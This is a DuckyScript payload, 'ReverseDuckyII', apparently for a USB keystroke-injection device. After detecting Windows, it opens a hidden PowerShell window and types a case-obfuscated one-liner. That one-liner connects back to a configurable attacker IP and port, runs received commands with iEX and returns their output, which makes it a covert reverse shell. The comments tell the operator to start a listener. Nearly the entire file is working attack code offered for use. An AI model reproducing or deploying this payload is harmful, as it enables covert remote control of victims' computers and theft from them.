72 lines
2.4 KiB
Plaintext
72 lines
2.4 KiB
Plaintext
REM ReverseDuckyII
|
|
REM Version 2.0
|
|
REM OS: Windows / Multi
|
|
REM Author: 0i41E
|
|
REM Requirement: DuckyScript 3.0
|
|
|
|
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
|
|
REM If inserted into a non Windows machine, the Ducky will appear broken.
|
|
REM DON'T FORGET TO START LISTENER
|
|
|
|
REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS
|
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
|
REM VERSION 1.0
|
|
|
|
REM Windows fully passive OS Detection and passive Detect Ready
|
|
REM Includes its own passive detect ready. Does not require
|
|
REM additional extensions
|
|
|
|
REM USAGE:
|
|
REM Extension runs inline (here)
|
|
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
|
REM boot delay
|
|
REM $_OS will be set to WINDOWS or NOT_WINDOWS
|
|
|
|
REM CONFIGURATION:
|
|
DEFINE MAX_WAIT 150
|
|
DEFINE CHECK_INTERVAL 20
|
|
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
|
|
DEFINE NOT_WINDOWS 7
|
|
|
|
VAR $MAX_TRIES = MAX_WAIT
|
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
|
DELAY CHECK_INTERVAL
|
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
|
END_WHILE
|
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
|
|
$_OS = WINDOWS
|
|
ELSE
|
|
$_OS = NOT_WINDOWS
|
|
END_IF
|
|
|
|
REM EXAMPLE USAGE AFTER EXTENSION
|
|
REM IF ($_OS == WINDOWS) THEN
|
|
REM STRING HELLO WINDOWS!
|
|
REM ELSE
|
|
REM STRING HELLO WORLD!
|
|
REM END_IF
|
|
END_EXTENSION
|
|
|
|
REM Configure your settings below:
|
|
REM Insert the attacking IP between '' & define your port
|
|
DEFINE ATTACKER '192.168.178.25'
|
|
DEFINE PORT 4444
|
|
REM Set the default DELAY
|
|
DEFINE WAIT 500
|
|
|
|
IF ($_OS == WINDOWS) THEN
|
|
DELAY 1500
|
|
GUI r
|
|
DELAY WAIT
|
|
STRINGLN powershell -NoP -NonI -w h
|
|
DELAY WAIT
|
|
STRINGLN $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt( ATTACKER , PORT );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit
|
|
REM Capslock light will indicate a finished payload
|
|
CAPSLOCK
|
|
ELSE
|
|
REM Inserting the Ducky into a non Windows machine will result in ATTACKMODE OFF
|
|
ATTACKMODE OFF
|
|
END_IF
|
|
|
|
|